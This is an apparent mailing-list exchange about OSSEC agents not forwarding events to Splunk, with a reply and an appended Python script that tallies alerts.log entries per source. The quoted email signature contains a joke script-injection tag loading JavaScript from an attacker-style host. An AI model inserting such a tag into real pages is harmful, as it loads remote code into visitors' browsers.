I would check your alerts.log file on your HIDS and make sure your agents are reporting to the HIDS server. Only your OSSEC server should be configured with syslog_output forwarding to Splunk. I would also recommend the following sites for further reading: http://securityisfutile.blogspot.com or http://splunk.com (Splunkbase web site), and grab the *Splunk for OSSEC app*. Good luck!
On Mon, Apr 5, 2010 at 12:45 PM, Xavier Mertens <[email protected]> wrote:
> Hi *,
>
> I'm testing the integration of OSSEC with Splunk. I followed the
> configuration as described in the Wiki. It works!
> Splunk runs on my OSSEC server. The problem I have at the moment: only
> events generated by the server are sent to Splunk.
> I don't see any trace of events generated by the remote agents.
>
> Did I miss something in the design? ALL agents must have the syslog_output
> enabled?
>
> /x
>
> --
> My server is com<script src=http://owned.cn/js.js>pletely secure.
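
One way to run the alerts.log check suggested in the reply, as an added example that is not part of the original thread: it tallies alerts per source so you can see whether any agent events reach the server at all. It assumes the default multi-line alerts.log layout, where agent events carry an `(agent-name) ip->` prefix; the host names, addresses and sample alerts are constructed.

```python
import re
import sys
from collections import Counter

# Source line that follows each "** Alert" line (assumed default layout):
#   agent event:  2010 Apr 05 12:45:01 (web01) 192.168.1.20->/var/log/auth.log
#   server event: 2010 Apr 05 12:45:10 ossec-server->/var/log/auth.log
SOURCE_RE = re.compile(
    r"^\d{4} \w{3} \d{2} \d{2}:\d{2}:\d{2} "
    r"(?:\((?P<agent>[^)]+)\) \S+?|(?P<local>\S+?))->"
)

def count_alert_sources(lines):
    """Count alerts per source: 'agent:<name>', 'server:<host>' or 'unparsed'."""
    counts = Counter()
    expect_source = False
    for line in lines:
        if line.startswith("** Alert "):
            expect_source = True      # the next line names the event source
            continue
        if expect_source:
            expect_source = False
            m = SOURCE_RE.match(line)
            if not m:
                counts["unparsed"] += 1
            elif m.group("agent"):
                counts["agent:" + m.group("agent")] += 1
            else:
                counts["server:" + m.group("local")] += 1
    return counts

def agents_reporting(counts):
    """Names of agents that produced at least one alert."""
    return sorted(k.split(":", 1)[1] for k in counts if k.startswith("agent:"))

# Constructed sample alerts (not taken from the thread).
SAMPLE = """** Alert 1270464301.2345: - syslog,sshd,authentication_failed,
2010 Apr 05 12:45:01 (web01) 192.168.1.20->/var/log/auth.log
Rule: 5716 (level 5) -> 'SSHD authentication failed.'

** Alert 1270464310.2600: - syslog,sudo
2010 Apr 05 12:45:10 ossec-server->/var/log/auth.log
Rule: 5402 (level 3) -> 'Successful sudo to ROOT executed'

** Alert 1270464322.2811: - syslog,sshd,authentication_failed,
2010 Apr 05 12:45:22 (web01) 192.168.1.20->/var/log/auth.log
Rule: 5716 (level 5) -> 'SSHD authentication failed.'
"""

if __name__ == "__main__":
    # Pass the alerts.log path as the first argument; default to the sample.
    src = open(sys.argv[1], errors="replace") if len(sys.argv) > 1 else SAMPLE.splitlines()
    for source, n in sorted(count_alert_sources(src).items()):
        print(f"{n:6d}  {source}")
```

If only `server:` entries show up, the agents are not reporting to the manager, and changing the Splunk side will not help.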
